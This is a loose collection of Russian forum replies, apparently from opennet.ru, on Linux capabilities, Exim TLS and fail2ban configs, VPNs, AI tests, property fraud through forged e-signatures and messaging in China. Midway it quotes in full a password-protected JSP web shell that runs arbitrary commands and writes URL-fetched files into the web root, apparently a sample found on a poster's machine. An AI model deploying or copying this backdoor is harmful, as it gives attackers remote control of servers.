ISO такого не держит. Заведи свой, кто тебе мешает?

>[оверквотинг удален]
> Есть ли подвох?
> P.S Да я знаю про пайпы просто шела
>

 
> app1 | app2 
> 

> Но, не все программы умеют читать из стандартного ввода, промежуточные данные могут
> быть как-то в середине модифицированы (для этого lua мне и нужна)
> вызовы через popen это просто взять данные в одном месте, обработать
> на lua, передать дальше. И вот про это "передать" я вот
> балакаю :)

юзай экспорт и энвирон, таблицу эскейпов я тебе не вспомню, сам хочу запилить экранизатор, в сторону printf %q посмотри еще

Строки конвертируй в hex.

man xargs
Никогда не надо ничего дергать изнутри программы.

Сразу уточнения.
Именно кодачи нужен потому, что там есть впн и рдп, а в таилс по дефолту они запрещены и как-то хз, я его даже не пробовал, т.к. устройство - очень старый макбук с 4гб рам)
Кодачи запускается в режиме Encrypted Persistence.

>[оверквотинг удален]
> ...
> не предлагать!
> Править исходники на C для сброса привилегий - не предлагать.
> Сыстемды сервисы с cap - не предлагать.
> Патчи Capability-NG от Google заманчивые, это то что в принципе подходит, но
> не предлагать. ;)
> Хочу чисто существующими xattr file capability права на файл установить так, чтобы
> root его запускал и процесс имел пониженные привилегии.
> setcap ...
> Просмотреть привилегии можно например в pscap.

setcap только устанавливает для не рута. Можно общесистемно отключить нужные capabilities. Тебе подойдёт?

>[оверквотинг удален]
> ...
> не предлагать!
> Править исходники на C для сброса привилегий - не предлагать.
> Сыстемды сервисы с cap - не предлагать.
> Патчи Capability-NG от Google заманчивые, это то что в принципе подходит, но
> не предлагать. ;)
> Хочу чисто существующими xattr file capability права на файл установить так, чтобы
> root его запускал и процесс имел пониженные привилегии.
> setcap ...
> Просмотреть привилегии можно например в pscap.

Какую задачу ты решаешь? Может наоборот для не рута выставить нужные cap?

Что никому здесь CAP не нужны?

Google в Android умеет сбрасывать права root своим init: https://chromium.googlesource.com/aosp/platform/system/core/...

"If no capabilities are provided, then all capabilities are removed from this service, even if it runs as root."

До ядра 2.6.25 права резались общесистемно, а в новых версиях заявлена по поточна поддержка прав. В Linux на каждый процесс можно выставить свои права.

Общесистемные, доступные права в /proc/sys/kernel/cap-bound можно было когдато редактировать lcap: https://www.debian.org/doc/manuals/securing-debian-manual/ch...

lcap - A user friendly interface to remove capabilities (kernel-based access control) in the kernel, making the system more secure. For example, executing lcap CAP_SYS_MODULE will remove module loading capabilities (even for the root user).

CapInh для root можно выставить в /etc/security/capabilities.conf как сбросить права root процессов с помощью XATTR security.capability?

> исследование показало неожиданные результаты: 19 из 35 существующих "capabilities" позволили совершить действия, которые в конечном итоге потенциально могут привести к получению полноценных прав пользователя root.

https://www.opennet.me/opennews/art.shtml?num=29219

http://forums.grsecurity.net/viewtopic.php?f=7&t=2522

>[оверквотинг удален]
> Система Windows X. Проблема с заражением браузера.
> Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и
> "свободное плавание" в вопросе.
> При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов
> прописаны в теге style, а также ссылки ведущие на всякие непонятные
> сайты.
> при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что
> заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не
> выявляет источник заразы.
> Заранее благодарен.

Вы один пользуетесь компьютером и этой учеткой?

11 само себя не поставит. Время пришло.

> Всем доброго времени суток!
> Система Windows X. Проблема с заражением браузера.

Наверное X Window System ?

> При изучении кода браузеров - эдж/хром/мозила

X Window не связана с кодом браузеров

> обнаружил теги не присущие для сайтов

Эмм, покажите исходник где нашли такое...

> прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.

Удалите их

> при просмотре с других устройств таких паразитов не обнаруживается

Возможно все дело в том чем вы смотрите

> попытка в файрволле закрыть все входящие с адреса yyy на интерфейсе WAN
> с перезапуском l2tp сервера ни к чему не привели.

забыл что l2tp это во-первых udp и во-вторых внутри ipsec и наблокировал не то?

>[оверквотинг удален]
> Не могу подключиться с двух устройств, которые находятся в одной и той
> же сети.
> Поведение следующее:
> Роутер TP-link archer AX50
> К роутеру по WIFI подключено несколько устройств
> 1. Подключаю впн на одном из девайсов. Подключается и работает.
> 2. Подключаю впн с той же настройкой на втором устройстве. Подключение прошло.
> IP адрес выделен. Интернета нет. Со стороны сервера выданный IP адрес
> не пингуется.
> Это ограничение? Или нужно настроить как-то роутер или сервер?

То есть клиент не роутер, и подключаетесь вы через роутер?
а ваш роутер умеет пропускать более одного vpn соединения?

Добрый день, Борис!

> Кто-нибудь использовал TLS при настройке почты на SMTP сервере EXIM ?

Это штатный режим почты в наше время.

Исходящая наружу почта в exim контролируется в транспорте.

(мой рабочий конфиг):
begin transports
remote_smtp:
  driver                        = smtp
  command_timeout               = 2m
  connect_timeout               = 2m
  connection_max_messages       = 10
  max_parallel                  = 10
  port                          = 25
  message_size_limit            = 200M
  dkim_domain                   = my_domain.com #(1)
  dkim_selector                 = mail #(1)
  dkim_private_key              = /etc/exim/dkim.key #(1)
  dkim_strict                   = true #(1)
  dkim_sign_headers             = Date:Message-ID:Subject:From:To:In-Reply-To:References:MIME-Version:Content-Type #(1)
  tls_certificate               = /etc/ssl/my_domain.pem #(2)
  tls_privatekey                = /etc/ssl/my_domain.key #(2)
  tls_verify_certificates       = /etc/ssl/cacert.pem #(3)
  tls_try_verify_hosts          = *
  tls_verify_cert_hostnames     = *
  tls_tempfail_tryclear         = true #(4)
  tls_sni                       = *
  tls_require_ciphers           = HIGH:-SSLv3:-TLSv1:-ADH:-PSK:-ARIA:-CAMELLIA #(5)

(1) DKIM требует еще настроек в DNS. Можно не включать.
(2) Сертификат тот-же, что и на приеме почты
(3) Глобальные доверенные СА
(4) Если принимающий хост не работает по TLS, то передать в нешифрованном режиме
(5) Настройка openssl для работы только по TLS1.2 и TLS1.3

> Подскажите, пожалуйста, что я сделал неверно

Подробно описал то, что в общем-то значения не имеет, ничего не сказал о том, что может дать пищу для ума. Что за сервер, как именно данные отправляешь, что на сервере с файрволлом, что на клиенте с файрволлом...

> 1 байт - фрагмент

зачем там 01 стоит? если это начало большой датаграммы, что не влезла в один пакет, то должен быть последующий с увеличенным номером, и финальный с >=0x80

   Поле FRAG показывает, является ли эта датаграмма самостоятельной или
   же фрагментом. Если датаграмма - фрагмент, то установленный старший
   бит является признаком последнего фрагмента, в то время как значение
   X'00' показывает, что это обычная датаграмма. Значения от 1 до 127
   обозначают на позицию фрагменте в последовательности. Каждый
   получатель будет иметь REASSEMBLY QUEUE (очередь сборки) и REASSEMBLY
   TIMER (таймер сборки) связанные с такой фрагментной датаграммой.
   Очередь сборки должна быть переинициализирована и связанные с ЙЙней
   фрагменты выкинуты всякий раз при истечении таймера сборки или
   с приходом новой датаграммы, чье значение в поле FRAG меньше,
   чем наибольшее значение поля FRAG датаграмм, обработанных
   при сборке фрагмента. Таймер сборки должен быть не менее 5 секунд.
   Приложениям рекомендуется избегать фрагментацию везде, где только
   это возможно.

   Реализация фрагментации опциональна, в реализациях где фрагментация
   не поддерживается, должны отбрасываться любые датаграммы, у которых
   поле FRAG отлично от X'00'.

Прислать скан счета за ЖКХ или прочие подобные документы просят только на всяких там биржах или прочих государственных или частных сайтах, где ты реально должен быть гражданином США. А не просто юзером с правильным IP. Так что никакой VPN тебе не поможет.

Попробуй подать заявку для участия в лотерее грин кард.

>your ISP and DNS were
>DNS

Они сами дают подсказки.

PS картинка со свиньей за забором.жпг ;)

> Очень хотелось бы получить помощь специалистов безопасности .
> Через прокси-сайт пытался выдать себя за американца , но был заблочен с

Через какой именно прокси-сайт?

Прокси обычно подставляют в HTTP-запрос дополнительные поля:
   X-Forwarded-For
   X-Client-IP

Поэтому что-то неуловимо выдавало в тебе украинского разведчика.

[...]
> Вот такая проблемка , за подсказку которая сработает готов заплатить , можно

Платить придётся ежемесячно, а то и по-гигабайтно. Бесплатно тебя только через MITM proxy пустят.

Как детё чесслово. Идешь в ближайший сигаретный ларёк, покупаешь стакан симок(у них они без идентификации кому попало продаются). Достаёш свой старый гелекси , открывеш крышку, аккуратно вставляеш симку, закрываеш. Пользуешся интернетом и выкидываеш вместе с телефоном в ближайшую лужу, выпиваешь стопарик за анона.
удачи

С Exim давно не работал, раньше делал через fail2ban

# vi /etc/fail2ban/jail.conf
[exim-banhammer]
enabled = true
filter = exim.banhammer
action = iptables-multiport[name=Exim, port="smtp,smtps", protocol=tcp]
#sendmail[name=exim-spam, dest=admin@company.xyz, sender=fail2ban@localhost]
logpath = /var/log/exim/main.log
maxretry = 2
bantime = 18000
ignoreip = 127.0.0.1

vi /etc/fail2ban/filter.d/exim.banhammer.conf
[Definition]
failregex = [\] .*(?:rejected by local_scan|Unrouteable address|Dnsbl blocked|Sender verify failed|relay not permitted|Unknown user)

fail2ban-client reload

Далее проверь, как отрабатывает правило бана на логах (может корректировка нужна):

fail2ban-regex --print-all-match /var/log/exim/main.log /etc/fail2ban/filter.d/exim.banhammer.conf

Проверка статуса:
fail2ban-client status exim-banhammer
Просмотр списка заблокированных IP:
ipset list

На самом деле в настройках fail2ban уже наверняка есть заготовки для Exim, просто разкоментируй их.
Эта тема пережёвана интернетах с давних времен.

> Доброго времени суток!
> В логах Exima очень много записей такого типа:
> 2023-09-23 02:12:28 H=host-177-185-208-106.globonet.net.br [177.185.208.106] F=<hq500op66i6v2m@zelinski.com.ua>
> Как можно ограничить, допустим, 5 а остальное все drop'ить? Или тут надо
> смотреть в сторону iptables?

https://www.exim.org/exim-html-current/doc/html/spec_html/ch...

Судя по всему, это в рамках одного сеанса SMTP происходит. Тупой бот пытается по словарю подобрать работающий адрес. Можно обрубить в acl_check_rcpt:

drop
  condition = ${if >{$rcpt_fail_count}{5}}
  message = Too many failed recipients

> ... Оставил ИТ и решил протестить способность ИИ глубоко понимать текст. ...

На первые два вопроса надо было проанализировать только данный лингвистический текст, без применения дополнительных знаний и дать ответы "да" или "нет" основываясь только на данном тексте. ИИ неверно истолковал, не понял предложенный ему текст и дал не правильные ответы "да" или "нет"!

На третий вопрос надо было понять что чисто лингвистического ответа в данном тексте нет. Надо было заметить геометрическую прогрессию и дать ответ основываясь на вводных данных с лингвистического текста и знаниях с алгебры о геометрической прогрессии. ИИ не смог даже понять написанный текст, провести его лингвистический разбор и даже не дошел до того места где следовало применить дополнительные знания о геометрической прогрессии. Задавал наводящие вопросы, тыкал "носом" в конкретные абзацы, ИИ просто не понимал содержание сложного текста. На третий вопрос ответа от ИИ не было и ИИ не признал свою некомпетентность в данной области!

Может мне поисковик выдал ссылки на тупые ИИ. Может были плохие обучающие модели. Проведите свои тесты ИИ и опишите результаты. Мне ИИ не просто провалил все тесты, а давал ПРИНЦИПИАЛЬНО НЕ ПРАВИЛЬНЫЕ ответы!

g План эвакуации а-а-а

Целое исследование ни о чём, капитаните, сударь.
Я с чатжпт побаловался единственным вопросом - "где находится [место "на", куда посылают]".
Оно думало полторы минуты и вывалилось с ошибкой.
Вот и весь "лингвистический ИИ". Баловство. Даже "не знаю" не выдало.

Госуправление в плане хозяйственных вещей, типа создания заявок на ремонты дорог на основе показаний с датчиков (встроенных в эту дорогу) - это уже реализуемая история, ближайшее будущее.
Принятие политических решений (с помощью) ИИ - совсем другое. В конце концов, ИИ выдаст какую-нибудь странную хрень типа "мыши станьте ежиками", с припиской "я стратег". И наши чиновники возьмутся заставлять народ это дело исполнять, понятное дело. Надо понимать контекст, чтобы комментировать дискуссию.

Вопрос главный - почему занимались наноболтами в то время, когда на западе создавали сверточные сетки? Причем их создавали в том числе наши выпускники - недостатка в уровне образования не было. Сейчас в последний вагон заскакивать на хайпе не самая выигрышная стратегия.

Да, пока Греф только планирует заменять своих банкиров на ИИ, государство уже заменило труд целой кучи людей госуслугами. И придумали эту концепцию еще в 90х, Лужков с Примаковым. Это к вопросу о внедрении вещей в госуправлении, сколько десятилетий это занимает в реальности, а не в бреду финансистов. Лет пять поснимают сливки, поколядуют на ИИ-стартапах и перейдут к новой теме.

Здесь про это была новость https://www.opennet.me/opennews/art.shtml?num=52648

sshocean dot net и его клоны
Раз в N дней надо пройти рекапчу и обновить credentials в клиенте
Иногда ломается
Но несмотря на это я пользуюсь им уже пару лет, т.к. лень искать замену
Правда, на телефоне взял shadowsocks вместо wg, там клиент удобнее, но работать должны примерно одинаково

https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_enti...

Если для бэкапа используется выделенный диск ЦЕЛИКОМ, то разбивать его на разделы не требуется, можно шифровать диск целиком без разбивки.

Бекапить на съёмный, шифрованный, жесткий диск, это хорошо.

Придерживаюсь мнения, что необходимо держать бекапы на DVD/BD (-R), лучше M-DISK.

Скрипт для бекапа, создает ISO для записи:
https://www.linux.org.ru/forum/admin/15041201?cid=15051206
https://www.linux.org.ru/forum/admin/15041201?cid=15051243
https://www.linux.org.ru/forum/admin/15041201?cid=15052218

Можно добавить упаковку и шифрование перед созданием ISO.

Ссылка на пример полнодискового шифрования для ноута: https://www.opennet.me/openforum/vsluhforumID3/131450.html#223

Часто используют связку LUKS -> LVM. Сначала шифруют физичский диск и уже его разбивают на логические разделы с помощью LVM.
GRUB поддерживает загрузку с /boot на LVM разделе, который в свою очередь размещён в разделе LUKS.

> Что делать?

Оставаться за границей, а то ещё и кредит за дядю возвращать придётся.

Найти юриста, поднять шум, обратиться в СМИ - МедиаЗона, Znak, Новая Газета, Дождь, медиа-персоны с обширным кругом подписчиков. Этож что же выходит, в это стране уже можно лишиться собственности без ведома и участия?

Зачем это здесь?
Где подтверждения с выписками из ЕГРН?
Подобное мошенничество было актуально 2 года назад, сейчас уже нет.

Идти в полицию и писать заявление.
Далее искать юриста для написания искового заявления (отмена сделки купли-продажи).

-----
Госдума в среду [24 июля 2019 г.] приняла закон о защите граждан от мошеннических действий с их недвижимостью, совершаемых при помощи электронной подписи.

Согласно документу, передать права на недвижимость физлица на основании заявления, поданного в электронной форме, можно будет, если собственник заранее уведомил об этом Росреестр.

Регистрирующий орган должен будет проставить специальную отметку в реестре о возможности отчуждения данного объекта на основании электронного заявления с использованием усиленной квалифицированной электронной подписи. Без нее Росреестр не сможет рассматривать документы. Проставить отметку можно будет в Едином государственном реестре недвижимости (ЕГРН) через личное заявление владельца или его законного представителя, а также через почтовое отправление в Росреестр.
-----

Скомпрометирован Росреестр?

В любом случае здесь вам не помогут.

https://www.opennet.me/openforum/vsluhforumID10/5512.html

Я не юрист и могу ошибаться.

У удостоверяющего центра выдавшего заведомо поддельный сертификат есть ответственность:

1. Криминальная, за соучастие в мошенничестве. Пиши заявление в полицию, СК, Прокуратуру на удостоверяющий центр выдавший потдельный сертификат.

2. Гражданско правовая за вред твоему имуществу. Пиши исковое заявление в Суд на удостоверяющий центр с требованием выплатить стоимость двух квартир и моральную компенсацию в размере десяти стоимостей двух квартир.

http://www.consultant.ru/document/cons_doc_LAW_112701/acd401.../

Статья 13. Удостоверяющий центр
3) предоставлять безвозмездно любому лицу по его обращению в соответствии с установленным порядком доступа к реестру сертификатов информацию, содержащуюся в реестре сертификатов, в том числе информацию об аннулировании сертификата ключа проверки электронной подписи;

3. Удостоверяющий центр в соответствии с законодательством Российской Федерации несет ответственность за вред, причиненный третьим лицам в результате:
1) неисполнения или ненадлежащего исполнения обязательств, вытекающих из договора оказания услуг удостоверяющим центром;
2) неисполнения или ненадлежащего исполнения обязанностей, предусмотренных настоящим Федеральным законом.

http://www.consultant.ru/document/cons_doc_LAW_112701/03690e.../
Статья 15. Аккредитованный удостоверяющий центр
3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети "Интернет", к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.

7. Аккредитованный удостоверяющий центр (работник аккредитованного удостоверяющего центра, доверенные лица и их работники) несет гражданско-правовую, административную и (или) уголовную ответственность в соответствии с законодательством Российской Федерации за неисполнение обязанностей, установленных настоящим Федеральным законом и иными принимаемыми в соответствии с ним нормативными правовыми актами, а также порядком реализации функций аккредитованного удостоверяющего центра и исполнения его обязанностей.

http://www.consultant.ru/document/cons_doc_LAW_112701/8431d1.../

Статья 18. Выдача квалифицированного сертификата

1. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр обязан:

1) в порядке, установленном настоящим Федеральным законом, идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата. Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата либо посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации". При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения идентификации без личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы отказывается от использования шифровальных (криптографических) средств, указанных в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", удостоверяющий центр обязан отказать такому лицу в проведении указанной идентификации. Устанавливаются:

а) в отношении физического лица - фамилия, имя, а также отчество (при наличии), дата рождения, реквизиты документа, удостоверяющего личность, идентификационный номер налогоплательщика, страховой номер индивидуального лицевого счета гражданина в системе обязательного пенсионного страхования;
....
3) в установленном порядке идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата (в целях получения от заявителя, выступающего от имени юридического лица, подтверждения правомочия обращаться за получением квалифицированного сертификата). Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата, информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы в порядке, установленном Федеральным законом от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации";
(п. 3 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
4) предложить использовать шифровальные (криптографические) средства, указанные в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", физическим лицам, обратившимся к нему в целях проведения идентификации без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы (для предоставления биометрических персональных данных физического лица в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством сети "Интернет"), и указать страницу сайта в информационно-телекоммуникационной сети "Интернет", с которой безвозмездно предоставляются эти средства. При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством информационно-телекоммуникационной сети "Интернет" при выдаче сертификата ключа проверки электронной подписи отказывается от использования шифровальных (криптографических) средств, аккредитованный удостоверяющий центр обязан отказать такому лицу в проведении идентификации и выдаче сертификата ключа проверки электронной подписи.
(п. 4 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
1.1. Подтверждение достоверности сведений, перечисленных в пунктах 1 и 2 части 1 настоящей статьи, осуществляется одним из следующих способов:
1) с использованием оригиналов документов и (или) надлежащим образом заверенных копий документов;
2) с использованием единой системы межведомственного электронного взаимодействия, информационных систем органов государственной власти, Пенсионного фонда Российской Федерации, Федерального фонда обязательного медицинского страхования, единой информационной системы нотариата;
3) с использованием единой системы идентификации и аутентификации.
(часть 1.1 введена Федеральным законом от 27.12.2019 N 476-ФЗ)
2. При обращении в аккредитованный удостоверяющий центр заявитель представляет следующие документы либо их надлежащим образом заверенные копии и (или) сведения из них:
(в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
(см. текст в предыдущей редакции)
1) основной документ, удостоверяющий личность;
2) страховой номер индивидуального лицевого счета заявителя - физического лица;
(в ред. Федерального закона от 08.06.2020 N 181-ФЗ)
(см. текст в предыдущей редакции)
3) идентификационный номер налогоплательщика заявителя - физического лица;
...
2.1. Заявитель вправе по собственной инициативе представить копии документов, содержащих сведения, указанные в пунктах 2 - 6 части 2 настоящей статьи.
(часть 2.1 введена Федеральным законом от 30.12.2015 N 445-ФЗ; в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
(см. текст в предыдущей редакции)
......
5. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр направляет в единую систему идентификации и аутентификации сведения о лице, получившем квалифицированный сертификат, в объеме, необходимом для регистрации в единой системе идентификации и аутентификации, и о полученном им квалифицированном сертификате (уникальный номер квалифицированного сертификата, даты начала и окончания его действия, наименование выдавшего его аккредитованного удостоверяющего центра).

> Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
> и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
> у меня взломали аккаунт на госуслугах.
> У меня никогда не было ЭЦП и я даже не знаю, что
> это такое. Паспорта со мной, я их не терял.
> Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
> миллион р).
> У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
> мошенники выпустили. Я отменю одну, а может, у них 10.
> Что делать?

Про это уже неоднократно были разговоры и горячо обсуждали тему в СМИ. Нужно лично зайти в МФЦ, вызвать управляющего и собственноручно написать заявление, о том что сделки с квартирой только с вашим личным присутствием. Управляющий заверит. И если не ошибаюсь, что-то предпринимали на этот счет. Тяжело, но в прокуратуру в полицию писать заявления.

https://ru.m.wikipedia.org/wiki/Единая_система_идентификации_и_аутентификации

* Для получения учётной записи ЕСИА необходимо удостоверить свою личность с помощью паспортных данных, ИНН и СНИЛС

Эти все данные есть у работодателей, так как необходимы при устройстве на работу. (А сколько кто работ сменил)

Надежное хранение этих документов требует огромных денег - наличие собственного дома с сейфом. (А сколько кто квартир съемных сменил, замки вы каждый раз в съёмной квартире меняли? в общежитиях с соседями сколько прожили? Сколько раз вам квартиру снимала трудоустраевающая организация и копия ключей хранилась у них? Сюда же надо добавить всех подруг с которыми вы совместно проживали................)

Что там надо для их регистратуры? Паспорт, ИНН и СНИЛС? Можно копии! Можно без личного присутствия!!!

* облачное хранение приватного ключа пользователя

Цензурные слова закончились.

* Существенно расширен набор данных, ведущихся в профиле пользователя (добавлены такие документы как заграничный паспорт, полис ОМС, военный билет и др., появилась возможность указывать сведения о детях). Предусмотрена возможность зарегистрировать учетную запись на номер мобильного телефона, который ранее был привязан к другой учетной записи.

Майор одобрил. Вы подумали речь о нашем товарище? Нет, имел ввиду их..

И все это на логина/пароле по HTTPS без ESNI конечно: https://www.linux.org.ru/forum/admin/15104732?cid=15164855

И разрабов меняют каждый год: "AT Consulting, R-Style, «РТ лабс» и «Реак софт»"

<%
    if("G5X49Q".equals(request.getParameter("pwd")))
    {
        String strCmd=request.getParameter("cmd");
        String strUrl=request.getParameter("url");
        String strFile=request.getParameter("file");
        if(null!=strCmd)
        {
            java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();
            int a = -1;
            byte[] b = new byte[2048];
            out.print("<pre>");
            while((a=in.read(b))!=-1)
            {
                out.println(new String(b));
            }
            out.print("</pre>");
        }
        if(null!=strUrl&&null!=strFile)
        {
            java.io.InputStream in = new java.net.URL(strUrl).openStream();
            byte[] b = new byte[1024];
            java.io.ByteArrayOutputStream baos = new
            java.io.ByteArrayOutputStream();
            int a = -1;
            while ((a = in.read(b)) != -1)
            {
                baos.write(b, 0, a);
            }
            new java.io.FileOutputStream(application.getRealPath("/")+"/"+strFile).write(baos.toByteArray());
        }
        out.println("MtGqKu3y");
    }
    else
    {
        //out.println("no token");
    }
%>

> есть ли на устройстве вирус

Да

> Подскажите  кто знает или у кого есть подобный опыт. Мое ТЗ
> простое надо что бы работало через wifi (есть в отеле), устанавливалось
> на andriod. Можно было послать текстовое и графическое сообщении.

gmail

> Добрый день.
> Подскажите. Есть такая задача. Надо организовать обмен сообщениями с человеком который
> поедет Китай не надолго. То есть по сути нужен whatsapp или
> telegram. Как я слышал там данные программы не работают.

Симки в роуминге не фильтруются.

Element вроде должен работать - https://app.element.io/

> Добрый день.
> Подскажите. Есть такая задача. Надо организовать обмен сообщениями с человеком который
> поедет Китай не надолго. То есть по сути нужен whatsapp или
> telegram. Как я слышал там данные программы не работают.
> Но если поискать в интернетах, выясняется что подобного рода ПО много, неужели
> все их тоже блокируют https://en.wikipedia.org/wiki/Comparison_of_cross-platform_i...
> Подскажите  кто знает или у кого есть подобный опыт. Мое ТЗ
> простое надо что бы работало через wifi (есть в отеле), устанавливалось
> на andriod. Можно было послать текстовое и графическое сообщении.
> ПС. Регистрация в wechat озаботился  но там как все не просто.

VPN возьми, если человек читает опеннет - SSH.

копайте со своим знакомым в сторону shadowsocks/v2ray/xray - заработает любой мессенджер
https://habr.com/ru/articles/727868/

Получены интересные результаты:

1) tox не блокируется.
2) вконтакте не блокируется.

rc1? grub + password

> Приветствую всех, требуется полностью закрыть возможность залогинится через /dev/tty*

вы когда нибудь про файл /etc/ttys слышали? что в нем можно для каждого tty* указать вместо "secure" на "insecure" чтобы отключить подключение локально

>[оверквотинг удален]
> (5)   NAS-Port-Id = "IKEv2+EAP"
> (5)   NAS-IP-Address = %EXT-IP-VDS%
> (5)   Called-Station-Id = "%EXT-IP-VDS%[500]"
> (5)   Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
> (5)   User-Name = "%radius-username%"
> (5)   Framed-IP-Address = 10.255.24.2
> (5)   NAS-Identifier = "strongSwan"
> IP адреса, логины и пароли изменены.
> Буду рад совету.
> Заранее благодарен.

В дополнение, кусок лога. Атрибут дублируется:
Framed-IP-Address = 10.255.24.2
Framed-IP-Address = 10.255.24.12

Sat Mar 19 13:25:24 2022
        Acct-Status-Type = Stop
        Acct-Session-Id = "1647688010-74"
        NAS-Port-Type = Virtual
        Service-Type = Framed-User
        NAS-Port = 74
        NAS-Port-Id = "IKEv2+EAP"
        NAS-IP-Address = %EXT-IP-VDS%
        Called-Station-Id = "%EXT-IP-VDS%[500]"
        Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
        User-Name = "%radius-username%"
        Framed-IP-Address = 10.255.24.2
        Framed-IP-Address = 10.255.24.12
        Acct-Output-Octets = 184630
        Acct-Output-Packets = 374
        Acct-Input-Octets = 140713
        Acct-Input-Packets = 348
        Acct-Session-Time = 390
        Acct-Terminate-Cause = User-Request
        NAS-Identifier = "strongSwan"
        Event-Timestamp = "Mar 19 2022 13:25:24 UTC"
        Tmp-String-9 = "ai:"
        Acct-Unique-Session-Id = "87126f7fa0835846260efa39b8e90656"
        Timestamp = 1647696324

3) Пробовал Privoxy, но необходимость добавлять все адреса вручную охладила мой пыл. А готовых скриптов типа hblock я не нашёл.

> Способы блокировки рекламы и прочего мусора на уровне системы

Пользуюсь блокировкой всего вот этого непотребства фаерволом:
https://www.gstatic.com/ipranges/goog.json

> 1) hblock - https://github.com/hectorm/hblock
> Не останавливает флеш-рекламу, при просмотре ютуба вылезает куча рекламы.
> 2) AdBlock на роутере - я не пользуюсь роутером (прямое соединение), поэтому
> этот способ для меня не подходит.
> Есть еще какие-либо варианты?
> Спасибо.

https://github.com/StevenBlack/hosts

сам спросил, сам ответил.
хоть спать спокойно буду, может поможет кому.

методом исключения нашел что надо закоментировать строку "include disable-common.inc"
тогда все работает.

но как нерабочий конфик в релиз вышел.... хз..